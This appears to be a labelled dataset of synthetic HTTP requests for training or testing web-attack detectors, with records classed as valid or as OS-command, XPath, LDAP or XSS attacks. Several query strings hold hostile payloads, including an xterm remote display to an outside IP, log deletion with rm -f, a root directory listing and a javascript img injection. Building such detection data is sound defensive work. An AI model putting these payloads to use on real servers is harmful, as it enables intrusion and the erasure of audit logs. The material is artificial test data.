~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44841
Start - Id: 23870
class: Valid
GET /tMUjIc0-opE/0at12e4eSkeoyfpaRi/nYpw.qsJTnsP4/i0l8s@Kkfa5T/wC741xvWDC3U/1ijxe6.zFYrOxnuwXCm/wH7VbbDCJMJ_/neqTpEa/eSr9xJ33KoH6/ekb3Fdk3E2K2/oNfCKcmlcL_BFA2lx-kZ.html?lkiIe=%3Ds&SJfixUN=6&@httpstK_sUe=522&fK4dIWfH279M=0&loegaouasruii=hess%27Szdt&Dd5xp_=ueG&PgKhyLzQqAi=iei9aern6&6xayuw=naAtscrb&eaiEodn=tiOqP8unHB&eb=%5Bcne&5irn2o=%3Ergtgroup+byae&Qounzs0nsrst=%284o%3C%27c&bc=%27usrdexec&pttniowtpwa=388 HTTP/1.0
Host: www.idoo.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=75845
Client-ip: 252.57.113.38
Cookie: Rnr=aWqJwMZhvB;wt=66073353;adE5m0ashttpX=RryjArrDt2;m-5KsuV=lzOcQR3xyL;dE2Z=70358
Cookie2: $Version="57"
Date: Sat, 19 Dec 09 11:49:59 UTC
ETag: W/"Gb8eTEjVMnzP_op."
Expect: 100-continue
From: r0dm@twn4oe.uk
If-Modified-Since: Sat, 10 Jan 04 17:53:02 UTC
If-Unmodified-Since: Sat, 03 Apr 10 05:05:58 CET
If-Match: *
If-None-Match: "5DAjtXlQkmFRzzX"
If-Range: Fri, 03 Oct 08 13:28:28 CET
Max-Forwards: 458
MIME-Version: 6.3
Pragma: N=4leEyanl
Proxy-Authorization: ree1 RTnsdpfs=hElt
Authorization: Digest realm
Range: -9873
Referer: /qdehis/i7fwia0l/A3ztne/k0exxu.css
TE: trailers,trailers,deflate;q=0.9
Trailer: Connection
User-Agent: Mozilla/8.0 (compatible; Konqueror/5.6; Mac OS X; ttbonlnm)
UA-CPU: 68000
UA-Disp: 420,768,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2349x992
Via: 9.0 www.hroDwoTs.gif, HTTP/9.1 www.r2mmyy.tiff
Transfer-Encoding: gzip
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 011 156.147.40.52 "rdo9insd0rnm5isiuwim" "Sat, 18 Sep 04 21:23:03 CET"
X-Forwarded-For: 17.40.114.14
X-Serial-Number: 6817355934
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23870
Start - Id: 43458
class: OsCommanding
GET /To/x4PnFEdc.yCL/eoeote1an/ts/oZ9Q/nsTl7/ievp9hmWntmisan/v8P1eHlHCaA7B2OE8.pl?af=22&rSv=2zmhaoeudgeoecUs&cintjN=%7C+++%2Fusr%2Fopenwin%2Fbin%2Fxterm%2B-display%2B119.97.246.244%3A0%2500&hHrer=smomode&Foo3ZA@home=iF-XuFl&UU1f7.=13003211&otnmt=+-t&esaF=yalleeiaod&matha=w&bsaeeiseime0ME=isey8e0Eoeh&rysS=xchildTc2 HTTP/1.0
Host: www.nenxgpr.biz
Connection: close
Accept: video/mpeg, audio/*
Accept-Charset: euc-cn, x-mac-arabic
Accept-Encoding: identity
Accept-Language: j2oar-nhoIli;q=0.5, oo-e, 6r-tlesh;q=0.5
Cache-Control: min-fresh=91
Client-ip: 21.205.240.147
Cookie2: $Version="3"
Date: Wed, 07 Jan 09 16:19:24 UTC
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: 8oyrtlas
From: ictt@eelonuT.ch
If-Modified-Since: Fri, 11 Dec 09 13:35:43 UTC
If-Unmodified-Since: Fri, 03 Dec 04 20:40:27 CET
If-Range: Sat, 07 Apr 07 02:56:25 GMT
Max-Forwards: 9
MIME-Version: 2.3
Pragma: no-cache
Authorization: Digest realm
Referer: /er0tuei/fdmaa/nupdtO6g.fgf
TE: gzip;q=0.2
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 7.6; ho-bA; rv:1.6.1) Gecko/41892080
UA-Pixels: 5209x0173
Transfer-Encoding: compress
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43458
Start - Id: 1804
class: Valid
GET /s4hrvy3e9crc/EhAE-etcMchild.jpg?eehYutsxjC=7&gnu=nG.CgoA. HTTP/1.1
Host: 226.77.127.218
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.6, gzip;q=0.4, compress
Accept-Language: *;q=0.3
Cache-Control: max-age=06
Client-ip: 145.104.111.170
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Wed, 28 Apr 10 12:23:23 CET
ETag: "@oq1YXMt3iL8DPs"
Expect: 100-continue
From: itav@toutp6culd.com
If-Modified-Since: Tue, 10 Apr 07 05:45:00 CET
If-Unmodified-Since: Fri, 19 Sep 08 09:33:28 CET
If-Match: "qyd7rTjdgh0SJR21"
If-None-Match: *
If-Range: *
Max-Forwards: 510
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aGVZZTpnaGZlc3By
Authorization: ilczm id6sraco=oRehotn5
Range: 9724-,33511-083617,2-
Referer: http://noO5Se.de/3Fomc/newined/touz1Yro/ary9cd/tqoe5nrc.msf
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/2.9 (X11; U; Linux i586 2.6; 0o-e9; rv:9.4.0) Gecko/59623525
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 912x237
Via: FTP/5.2 90.196.254.102:04, 7.6 20.225.255.30:27349, FTP/1.2 65.234.20.1
Transfer-Encoding: gzip
Upgrade: cfa/2.8
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1804
Start - Id: 33691
class: Valid
POST /2M2WN-A6mP2/strwa0n41teil/n9sp7j_MQHcZhL/Oe4ssi/aEzC@aJl.Dd75DGF/tnMOa5D_m/r2Oe0CKRQBdUcNVx1r0/0bucp.ESi/uzHABKp0gtlaX2o.jsp? HTTP/1.1
Content-Length: 247
Content-Language: b,oDcgrz
Content-Encoding: deflate
Content-Location: http://mngm3.de/mOT1sDi/hlrhe/cslnB/qJ6gdI.pl
Content-MD5: NGxld0FyZXo4ZzhlZXRlMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Dec 04 23:50:54 GMT
Last-Modified: Fri, 07 Dec 07 23:47:07 UTC
Host: www.irririitrr.uk
Connection: b6EEes
Accept: image/jpeg, video/*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.3
Accept-Language: *;q=0.7
Cache-Control: max-age=6087
Client-ip: 188.178.199.117
Cookie: aetjow2tTryqb=5;anape=8555;kht1fe=7;CZ3@2ZAer1=iei graRtdhC;tiArewUa=vart
Cookie2: $Version="6"
Date: Sun, 30 May 04 01:21:56 UTC
ETag: "3EAe9ccRuWKgUN4WX"
Expect: 100-continue
From: rvteetoa@hiit.it
If-Modified-Since: Fri, 14 Oct 05 17:52:32 GMT
If-Unmodified-Since: Sun, 21 Dec 08 22:16:03 GMT
If-Match: *
If-None-Match: "KVpUOiZQcRfvbj_ar"
If-Range: *
Max-Forwards: 4647
MIME-Version: 1.7
Pragma: suts=o6
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: Digest realm
Range: 5-133497
Referer: http://www.uhutee.uk/nanrwxTi/nrwfebhH/m6aiAo/2Hfsiinh.pl
TE: chunked;q=0.3,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (X11; U; Solaris 0.0; sn-5r; rv:4.4.4) Gecko/58891913
UA-CPU: PowerPC
UA-Disp: 2201,8379,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 603x625
Via: HTTP/6.1 57.13.122.27:6, 3.5 99.220.187.113:32878, 7.9 www.awm6o.jpg
Transfer-Encoding: identity
Upgrade: zssryR/6.5, ijnS/5.1, dEsf/4.2, Wss/3.6, Ktea/4.4
Warning: 255 20.208.58.243 "jso9tss" "Tue, 24 Oct 06 11:42:11 CET"
X-Forwarded-For: 134.44.228.236
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

Rjkdscriptwherekvqx=23652641&1ThomezD=5taacuTgrrptLrf&OetNasyeIeiek=29465&1tzinompsCtiSt=72608301&oatagfb2io6ru=psnislu0u&Nngioooqlna=emn5r&ssare=~tf=NhsnstyleilinkyaRrt&bkHx98bM=ics&X@UQEWuUhr=u0Eoenwp-uabe4rcp&strzgdiio62fsPw=t(rOservicesr

End - Id: 33691
Start - Id: 49246
class: XPathInjection
GET /ioaevftzo1aon/tDrx/trRxGf./dBmIoqmW7X.-.msf?rIhe=Ercpm9%7CtnLn3yusrn+&do=hzeeodelete%5DZta&iinz9ohgtihtme=5l%2Fhr%2Fe%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D7%5D++%7C++++ehndep%2Frqge%2Fhl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D698%5D+++++or++++%27n7dnIha%27%3D+%27&7caxeumabaitnn=ejn4aOrc HTTP/1.0
Host: 178.208.139.111
Connection: keep-alive
Accept: application/*;q=0.3, application/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 247.83.20.197
Cookie: dODtmpP3x@wgetEl=94136625;CinusrCt82vCV5J=mf);mlie=enizIeoneas
Cookie2: $Version="1"
Date: Thu, 09 Nov 06 07:04:18 CET
ETag: "k0tNy17@VGo1UDQzY0"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Mon, 13 Aug 07 20:38:37 GMT
If-Unmodified-Since: Sat, 11 Jun 05 05:14:05 CET
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Tue, 04 Mar 08 12:27:06 UTC
Max-Forwards: 251
MIME-Version: 9.4
Pragma: ibgsvkee=n
Proxy-Authorization: Digest realm
Authorization: hvmos enswddc=rcerl
Range: 673-,-741678,577-
Referer: http://www.ie0gtmwr.com/UrarNHa.msf
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: tpst (iHqyD@; skQTqjieSs; ip3QH5w8)
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 4.5 8.224.35.56, 0.5 www.f4Aa.css
Transfer-Encoding: gzip
Upgrade: ja8xa/5.6
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49246
Start - Id: 43267
class: OsCommanding
GET /aZZRCYlKio2n16Ap9/njOHh5e6oKiJWvFJGr_a/3arqdnpna/fI.jpg?AiN4home_cmduA=%5Cnls+%2Froot%2F&vothrrtsdrt=8950&ditwnhdhCccbyun=000&mura1n=eh%27%2Boe8i0e HTTP/1.0
Host: 218.195.173.105
Connection: close
Accept: text/*, audio/basic;q=0.2, image/png
Accept-Charset: windows-1257;q=0.7
Accept-Encoding: identity;q=0.6, compress;q=0.7, compress, compress
Accept-Language: 1ecte-eE
Cache-Control: only-if-cached
Client-ip: 116.247.114.110
Cookie: fN2tJ0oupdateYwh-=q;epxhSp7qrw7=adminc9n+t;k8NU21YHmFKwhere=1627
Cookie2: $Version="2"
Date: Thu, 05 Nov 09 14:48:54 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: twur
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Sat, 19 Mar 05 22:05:30 GMT
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "P-4JHSO9WS9hOw.mD"
If-None-Match: "kM.0C@TK9XLxfleixvg"
If-Range: *
Max-Forwards: 273
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: zttEt dnvD=wlrt8e
Range: -640387
Referer: http://eBapeudt.gov/snra0h/6aes1/heddr/tai0Dr2n.wav
TE: trailers,trailers,chunked;q=0.1
Trailer: Referer
User-Agent: Mozilla/9.0 (Windows; U; WinNT 6.7; il-b8; rv:0.8.2) Gecko/68530581
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: FTP/6.5 www.eceeee.tiff, HTTP/7.8 www.dsset1ul.js:1690, tdt3/9.0 148.199.247.97
Transfer-Encoding: GEtztr; erelOo=e5VsE
Upgrade: lnphe/4.9
Warning: 800 46.120.121.199 "foFemwrttiu2" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 084960072910694484
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43267
Start - Id: 36959
class: LdapInjection
GET /dStgtxrezp0aBsed/3ac/Dv4Tj-kB@q.gif?Eztmp@=162251&kRFcsEbinD58e=iAd%3Etaccepte+%7CaDobject%29stdinztlx&aaumnzsc=shq&eApktnE=%29+++%28++%7C+%28sv%3D6jyhs*%29 HTTP/1.0
Host: 156.77.21.140
Connection: close
Accept: application/rtf, text/xml;q=0.7
Accept-Charset: big5;q=0.0, utf-8;q=0.5, x-mac-ce;q=0.4, iso-8859-2;q=0.3
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Cache-Control: min-fresh=4996
Client-ip: 113.131.200.174
Cookie: whqgbmimritaE=pSK53A0osy;easp=fpsVaqwitl d6s
Cookie2: $Version="041"
Date: Wed, 16 Mar 05 01:43:44 UTC
ETag: "wkT7m4in9sT6O9fore"
From: ooeh@nqieoausen.gov
If-Unmodified-Since: Tue, 20 Mar 07 09:13:59 UTC
If-Match: *
If-Range: Tue, 05 Sep 06 06:14:08 CET
Max-Forwards: 416
Pragma: atmIa=xmmn1aa0
Authorization: Basic dXFzZWxoZjpkaWlzU2Vt
Range: 84-,-422477,1197-5319
Referer: http://www.oMml.st/jyezja21/ieir1Xrt/tera/knehH.nsf
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: IIt5hpodoltno
UA-CPU: Sparc
UA-Pixels: 8538x2200
Upgrade: uot/3.3
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36959
Start - Id: 31963
class: Valid
GET /6PasB@iksZ2ZoP/DZfGS-t6/z1reE/iDRzmnKDFX/i8RX/ctin2/armfDjZZ/cpfpR/5as0drc/ef.css?AhauvtL=6962&aahuc=10&ih1e9l=%5CUcageatet%24%3Fu2yvhpl&qhftpNUVyinputvD4=7cEat&Lceagaainle=5833626&etRska=aRmP&6cfel=bhE&sssJ=62 HTTP/1.1
Host: 164.133.188.141:4
Connection: oa7Rt
Accept: application/*;q=0.3, image/png, application/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity;q=0.9, compress;q=0.3
Accept-Language: ezhSh9-ttn3ded;q=0.8, wihb-c, xi-ea, 3attg2fe-ncmc, sOt-ian
Cache-Control: no-store
Client-ip: 105.203.11.82
Cookie: aanw=1updatendivs;ymhhyhsen=0ti;jas=bOctmbvht
Cookie2: $Version="097"
Date: Wed, 26 Aug 09 10:58:28 GMT
ETag: "KCBOVIk-l57l3RK7"
Expect: oh4tn
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 12 Jun 05 03:34:21 GMT
If-Unmodified-Since: Sun, 18 Apr 04 11:49:45 UTC
If-Match: "ExNtmsW27sn8ySbuoPG"
If-None-Match: *
If-Range: "MUszFuCrnank7.GpTI"
Max-Forwards: 5
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: etsnds WdnRHatk=rhdNp
Authorization: latoT bl8e=teIuh
Range: -3
Referer: /tmsxQeqa/pgayycsc/Iein/cnceeMs.asp
TE: chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 6.7; 08-eI; rv:0.4.9) Gecko/73438238
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: FTP/9.7 www.hen8aaHC.png, oioOmH/1.0 www.obms.shtml
Transfer-Encoding: identity
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 372913
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31963
Start - Id: 29840
class: Valid
GET /eRJfe/eii/hHkwEdTx-Pr9lJeac3/eennlt8N5n/ls3tlreevdw7acutw2/emeneeRes/0kVAb.inputGwaccess_logkUU/t3hbaoaraeoAnctlsep/h-IVt9-ESgPJiJtQSqJ/sq_mE.shtml?rhhIbsrosy8ex=ee&rms1grA=263705&Atjqlahsln=iRmkM_883y&yfdmeWZ=26536&dlanne=rZVpiDT33&ss8ho=652742804&khhup=emsecsntunilO&crs5fhawsexh90=fkIr2ewaIiSoo&0chyvi3e=lBQ2 HTTP/1.1
Host: 210.254.85.213:89010
Connection: close
Accept: video/*;q=0.2
Accept-Charset: euc-kr;q=0.8, utf-8, iso-10646-ucs-2;q=0.5
Accept-Encoding: 
Accept-Language: MLbnrn7b-2tete4nn, e1ddmio-rziu;q=0.0, itna-4hi, lxecn-otg6end;q=0.6
Cache-Control: no-cache
Client-ip: 87.144.209.9
Cookie: pmgpbeerehnfh=khm;29tE=f:<hott uDi=gG
Cookie2: $Version="15"
Date: Tue, 17 Jul 07 01:28:26 CET
ETag: "g5A9lbqV99VONZA"
Expect: shrcbuA
From: rbldtdG@o7aniAtsO.ch
If-Modified-Since: Wed, 24 May 06 02:03:15 UTC
If-Unmodified-Since: Thu, 17 Mar 05 09:26:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8945
MIME-Version: 9.9
Pragma: nala6gea=7
Proxy-Authorization: msfja kissaf=Rn4lrtpj
Authorization: Basic YW5zbG5vOm9henpvbHI=
Range: -58988,5-,282881-
Referer: /tthNybco.png
TE: trailers,deflate,trailers
Trailer: Expect
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 0.7; vo-ts; rv:3.2.5) Gecko/86591396
UA-CPU: x86
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5691x8640
Via: 2.5 90.27.70.146:2
Transfer-Encoding: gzip
Upgrade: erOt/8.8, dtrg5/5.2, sO4/0.6, 1jiLT/0.8
Warning: 902 www.i1tt.html "thjesnuaSropsr" 
X-Forwarded-For: 121.62.194.6
X-Serial-Number: 59564326
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29840
Start - Id: 48070
class: XSS
GET /nKt4r@Z2ze/ctnreHf/eta/hh8eCwnriidtai/hgfKz.fTY/tUZuW75JCQ3mzi.8/siowo3ii6hlheE/9yV4XXKZmXnKwxtermE/rz3.jpeg?mata=8356&ad=m%3Faccepto3&izseGhren=%3Cimg++++src++++%3D%22++++javascript%3A+++%5Balert+++%28%27edrErbfoe%27%29%3B%5D++++%22%3E&tjhNxuTt4moic0=rs19isey&riehakxw=x%29&AIWRXpassthruV=E&a2pArDe=mpls&puahfd9SXr=eeari&osmh=%3B+ HTTP/1.1
Host: www.nYml.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, windows-1252, x-mac-japanese, isiri-3342
Accept-Encoding: deflate, identity, gzip;q=0.3, compress;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 185.80.82.48
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Mon, 25 May 09 23:30:17 GMT
ETag: "R5BYw6j-JCKxG5F_i"
Expect: fuezA
From: dhasadu@Aharrt.org
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "uq73dQZJVl33VABgs"
If-Range: *
Max-Forwards: 01
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=Hoedi
Range: -1,041-88,-53
Referer: /iEpa/neutYoam/ehau.swf
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.6 (compatible; Tt9eahn; Windows NT; hopaLHoaEs; etez7malei)
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Solaris
UA-Pixels: 6001x2247
Via: 0.4 www.i3wnlsdR.png
Transfer-Encoding: nptae
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48070
Start - Id: 25610
class: Valid
GET /m7ZOSNtHmU1/e2/eGcdbNoieeypnt/ulrcTuthh/pezGIXNBKU3Y_U/mzDhKDBgMy/tZmA6znRDFtcP9xWy/aYi3i6w3RhVcsam_gP/eHzE6DU0mroV7/i5i/eine/f9R2UxWrg_L.jpg?ems9DNsae7=8ttmochat%2B7se%24gmp&7tTtruues=2140379597&I0msy=41 HTTP/1.0
Host: 240.134.18.102:80
Connection: ecpe
Accept: image/png, image/*;q=0.3
Accept-Charset: iso-8859-5, us-ascii, euc-cn
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 70.74.10.34
Cookie: U2UFbKE6XU=t E
Cookie2: $Version="0"
Date: Fri, 17 Feb 06 05:52:15 CET
ETag: W/"-vFLLiCYGnZ.bQ_2Uxwx"
Expect: 100-continue
From: ofler@wmho0ac.it
If-Modified-Since: Thu, 08 Oct 09 16:29:32 UTC
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: "lmnFfJnF3JJUCEEPMm"
If-None-Match: "T-Tm3qwqW.6XfElCXyv"
If-Range: Sat, 28 Mar 09 11:22:04 CET
Max-Forwards: 69
MIME-Version: 6.8
Pragma: lQymttco=cyternr6
Proxy-Authorization: Basic bmRQaEVxOjNtZXJw
Authorization: Digest username="rtpsd0r"
Range: -1684
Referer: /roihneD/jhanf.sh
TE: trailers
Trailer: Cache-Control
User-Agent: epnUkat6armnaRvzcZ
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1157x6904
Via: 2.1 89.215.244.152
Transfer-Encoding: identity
Upgrade: iRa/1.6, iaAon/1.1
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 400505966006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25610
Start - Id: 43290
class: OsCommanding
GET /m-G6WcoU0PyGToH3Ee2/eishNod8ohla56.jpg?hto2t6rnlymr=PlLHrSi&a2rrtfoen8=ehete1c9iwgirt&eBDYeKOEu=r%28ucdhdS0d%3D%3Duo&8pr6eotmgHdooau=6117568&4h=0&tt7bbagIet=anaan%262qzatdcvopen+idHne&m8rr=r&iwettaald=bz%2F+&atdormzMdlht=oRnnctmoneissy1eib&ps=17&o3nrb=whXDty&Ifzgai9gmopt=%250arm+-f+++++%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B HTTP/1.0
Host: www.rmash.org:80
Connection: close
Accept: audio/x-wav;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: seV-o;q=0.2, urenbzt-agNi8uon, leo-pE;q=0.2, sqUalgTn-subt2hon;q=0.4
Cache-Control: min-fresh=7
Client-ip: 41.151.127.122
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="05"
Date: Mon, 15 Dec 08 09:55:21 CET
ETag: "6dhinw17JjJyr_-."
Expect: 100-continue
From: fztees@dntsngao.be
If-Modified-Since: Tue, 27 Apr 04 10:44:03 GMT
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 18 May 08 19:39:10 CET
Max-Forwards: 8
MIME-Version: 0.7
Pragma: tofT=avmteh
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic eW5vaDppZWZIdGlo
Range: 3300-751,9443-,-48
Referer: http://ecip.de/ee8iamx/3ehit3e/letE/3cde.htm
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.4 (compatible; wpia; Linux i586; erhsbTdl1W; areoG4; bysiuc9)
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: Oatx; 7l4awe=amst
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 78363352
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43290
Start - Id: 9084
class: Valid
GET /a8xABV/0VrJy8/ckUodG9l3Sb/rhvtuXdsrnO/se1u/unnzhnmtsooaai/sb4-n1S@WDvLoBJ9h.htm? HTTP/1.1
Host: 25.133.96.30:2895
Connection: close
Accept: */*
Accept-Charset: windows-1254, euc-tw, x-mac-arabic;q=0.3
Accept-Encoding: *
Accept-Language: ksaaonnz-NRogu;q=0.1, 0sS8-KTe, eiehalin-o, eiaEn-tsu6, Eiph-e4ss;q=0.4
Cache-Control: min-fresh=9
Client-ip: 212.96.25.34
Cookie: xezcEior8ii7hs=a]jrpa70bgsoundjgr;uotaaanS6yr=9
Cookie2: $Version="73"
Date: Tue, 18 Nov 08 16:10:09 CET
ETag: W/"3l9qrxDIQubeQZBIZ"
Expect: atctr7=tetz0Vi;iurtb
From: riunul@rssjpw.cz
If-Modified-Since: Thu, 24 May 07 12:10:54 CET
If-Unmodified-Since: Tue, 14 Jun 05 06:09:04 UTC
If-Match: "2.._@Vy996mf9WRdLO"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 3.6
Pragma: etwfH='marwa'
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: NTLM ZWloeHdtcnRvY2hkaWVFdGNld2w4aGN0dHNtZnpob3JSZ0RlZHRlYkRp
Range: 014973-,-2
Referer: /rjr8mt/lsoDet/ldpte9/mknofn.cfm
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (Windows; U; WinNT 9.9; d8-et; rv:8.1.8) Gecko/23429053
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: lioef/7.5 www.editee.jpg
Transfer-Encoding: compress
Upgrade: aaa/4.7, fk2w/0.5, aae/4.6
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9084
Start - Id: 35727
class: XPathInjection
GET /fh7cwUe/Otg5.-7/ebXLI9auJn@_U9/nL6dsystemchttp577jWkaT/12iuiuexule/enTdjAycohl8s/yMrrA-YRHhbt/xtermd/oW94K_Q@jblH@slMQl/fBJOggtEz7INvB/eoolhguiy1e3esUdeehi.css?nrbcdd0etneard=5271064&awtle=mC%27++++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++i+++%2B+j%2B+k+%2B+++l++++%2B++1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%270elrE%27++%3D+%27++++hox8bei%27++++or HTTP/1.1
Host: 152.72.58.172
Connection: dloy
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tmp-somiCi;q=0.4, tn1aNNE-pwteiy
Cache-Control: only-if-cached
Client-ip: 41.165.190.48
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="001"
Date: Sun, 05 Mar 06 10:10:21 GMT
ETag: "u39oPyKWUUBlk8Zb"
Expect: 100-continue
From: nptt@ai166.st
If-Modified-Since: Sun, 17 Sep 06 18:43:29 UTC
If-Unmodified-Since: Sat, 26 Jul 08 21:07:57 GMT
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: "MJH4Cnx74O.7P@z."
If-Range: Fri, 25 Apr 08 12:11:07 CET
Max-Forwards: 2811
MIME-Version: 4.7
Pragma: ulW='2ipl'
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Basic cmZsb29jdWU6ckRVNg==
Range: 820401-
